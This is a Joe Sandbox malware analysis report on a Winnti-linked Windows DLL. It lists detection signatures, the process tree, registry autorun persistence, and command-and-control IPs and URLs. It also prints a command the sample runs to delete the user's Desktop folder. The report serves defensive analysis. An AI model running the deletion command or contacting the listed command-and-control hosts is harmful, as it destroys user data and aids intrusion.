Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NaRZIOq3O8.dll

Overview

General Information

Sample name:NaRZIOq3O8.dll
renamed because original name is a hash value
Original sample name:e999daea87b481d11b4fd8559bdd3d68516dc0ef.dll
Analysis ID:1558496
MD5:8ae5deac29c6d351c2376da97b75b88a
SHA1:e999daea87b481d11b4fd8559bdd3d68516dc0ef
SHA256:6831f236816f9799458cff0c50116bcc3029f57e8cd8ab181204bc914789c1df
Tags:dlluser-NDA0E
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to infect the boot sector
Creates an autostart registry key pointing to binary in C:\Windows
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Queries disk data (e.g. SMART data)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 8188 cmdline: loaddll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7280 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7364 cmdline: rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 7508 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PING.EXE (PID: 7636 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • rundll32.exe (PID: 7312 cmdline: rundll32.exe C:\Users\user\Desktop\NaRZIOq3O8.dll,Group MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6128 cmdline: rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 4556 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 892 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 7636 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 7508 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6364 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 6196 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 6836 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7528 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Unpacked PEs

SourceRuleDescriptionAuthorStrings
3.2.rundll32.exe.10000000.0.unpackWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x2cdf2:$x1: cracked by ximo
  • 0x2cead:$x1: cracked by ximo
  • 0x2cf68:$x1: cracked by ximo
  • 0x2d023:$x1: cracked by ximo
  • 0x2d0de:$x1: cracked by ximo
  • 0x2d199:$x1: cracked by ximo
  • 0x2d254:$x1: cracked by ximo
  • 0x2d30f:$x1: cracked by ximo
  • 0x2d3ca:$x1: cracked by ximo
  • 0x2d485:$x1: cracked by ximo

Sigma Signatures

System Summary

barindex
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7312, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vicity

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: NaRZIOq3O8.dllAvira: detected
Multi AV Scanner detection for submitted file
Source: NaRZIOq3O8.dllReversingLabs: Detection: 89%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.0% probability
Machine Learning detection for sample
Source: NaRZIOq3O8.dllJoe Sandbox ML: detected
Source: NaRZIOq3O8.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: Binary string: c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*Z source: rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.**.* source: rundll32.exe, 00000003.00000003.3709951057.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3709925498.0000000002B33000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*\*.*g source: rundll32.exe, 00000003.00000003.1849601371.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1849653083.0000000002B33000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.**tate\*.*.*H{ source: rundll32.exe, 00000003.00000003.2132721514.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2134419805.0000000002B31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*.*m source: rundll32.exe, 00000003.00000003.2413353729.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2413606315.0000000002B3F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2293300146.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2332381587.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2413695167.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2332599254.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.**: source: rundll32.exe, 00000003.00000003.2533864222.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000B3C0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,lstrcpy,lstrcat,lstrcat,_strcmpi,PathIsDirectoryA,6D262DD0,strchr,strchr,strchr,strchr,atoi,CreateDirectoryA,Sleep,lstrcat,FindNextFileA,FindClose,3_2_1000B3C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10005A50 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,3_2_10005A50
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 202.108.0.52 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.241.186 12354Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.241.185 16300Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.241.193 6520Jump to behavior
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 107.163.241.186 ports 1,2,3,4,5,12354
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficTCP traffic: 192.168.2.10:49707 -> 107.163.241.185:16300
Source: global trafficTCP traffic: 192.168.2.10:49714 -> 107.163.241.193:6520
Source: global trafficTCP traffic: 192.168.2.10:49715 -> 107.163.241.186:12354
Source: Joe Sandbox ViewIP Address: 202.108.0.52 202.108.0.52
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: global trafficTCP traffic: 192.168.2.10:49717 -> 202.108.0.52:80
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.185
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.185
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.185
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.185
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.185
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.193
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.193
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.193
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.193
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.193
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.193
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.193
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.193
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.186
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10005E10 WSAStartup,socket,socket,socket,htons,htons,inet_addr,inet_addr,htons,inet_addr,bind,ioctlsocket,select,WSAGetLastError,Sleep,recvfrom,wsprintfA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,malloc,htons,htons,htons,htons,htons,htons,htonl,htons,inet_addr,sendto,closesocket,closesocket,closesocket,WSACleanup,3_2_10005E10
Source: global trafficDNS traffic detected: DNS query: blog.sina.com.cn
Source: rundll32.exe, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://107.163.241.185:16300/
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.185:16300//joy.asp?sid=rungnejcndvgnJLfFe5vteX8v2LUicbtudb8mteXmJe1nde
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://107.163.241.186:12354/login.php
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.php#)o
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.php()b
Source: rundll32.exe, 00000003.00000002.3769043111.000000000562D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3768985716.00000000055AD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.php)
Source: rundll32.exe, 00000003.00000002.3769274572.000000000584A000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.php;
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpAkn
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpB)H
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpData
Source: rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpMkb
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpSk
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpU)U
Source: rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.php_kt
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpbV
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpckP
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpogs
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpwk
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.186:12354/login.phpykV
Source: rundll32.exe, 00000003.00000002.3768985716.00000000055AD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.24I
Source: rundll32.exe, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%sXGRyaXZlcnNcZXRjXGhvc3RzLmljcw==XGRyaXZlcnNcZXRjXGhvc3Rz
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807
Source: rundll32.exe, 00000003.00000002.3769344739.000000000597D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807.
Source: rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807OW64
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807osoft
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807p
Source: rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807pSk
Source: rundll32.exe, 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp, NaRZIOq3O8.dllString found in binary or memory: http://www.rsac.org/ratingsv01.html

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000C0C0: wsprintfA,DeviceIoControl,3_2_1000C0C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10005160 ExitWindowsEx,3_2_10005160
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100062403_2_10006240
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000EAE03_2_1000EAE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000DAF03_2_1000DAF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100103B03_2_100103B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000F4603_2_1000F460
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000EED03_2_1000EED0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10001000 appears 283 times
Source: NaRZIOq3O8.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engineClassification label: mal100.troj.spyw.evad.winDLL@31/1@5/5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000C190 sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA,3_2_1000C190
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10005620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,3_2_10005620
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100068C0 6D262DD0,6D262DD0,6D262DD0,strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,3_2_100068C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100052E0 AdjustTokenPrivileges,3_2_100052E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: wsprintfA,rand,OpenSCManagerA,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,wsprintfA,wsprintfA,RegOpenKeyA,lstrlen,RegSetValueExA,wsprintfA,RegCreateKeyA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,RegCloseKey,RegOpenKeyExA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,GetLastError,RegCloseKey,RegCloseKey,3_2_10008880
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100051F0 CreateToolhelp32Snapshot,3_2_100051F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10006240 wsprintfA,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,6D262DD0,SysAllocString,CoSetProxyBlanket,wcscat,6D262DD0,SysAllocString,6D262DD0,VariantInit,VariantInit,VariantInit,VariantInit,6D262DD0,SysAllocString,InterlockedDecrement,_strcmpi,6D262DD0,SysAllocString,InterlockedDecrement,StrStrIA,VariantClear,VariantClear,VariantClear,CoUninitialize,3_2_10006240
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10008880 wsprintfA,rand,OpenSCManagerA,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,wsprintfA,wsprintfA,RegOpenKeyA,lstrlen,RegSetValueExA,wsprintfA,RegCreateKeyA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,RegCloseKey,RegOpenKeyExA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,GetLastError,RegCloseKey,RegCloseKey,3_2_10008880
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\Desktop\11121541Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\107.163.241.193:6520
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\M107.163.241.193:6520
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\NaRZIOq3O8.dll,Group
Source: NaRZIOq3O8.dllReversingLabs: Detection: 89%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\NaRZIOq3O8.dll,Group
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
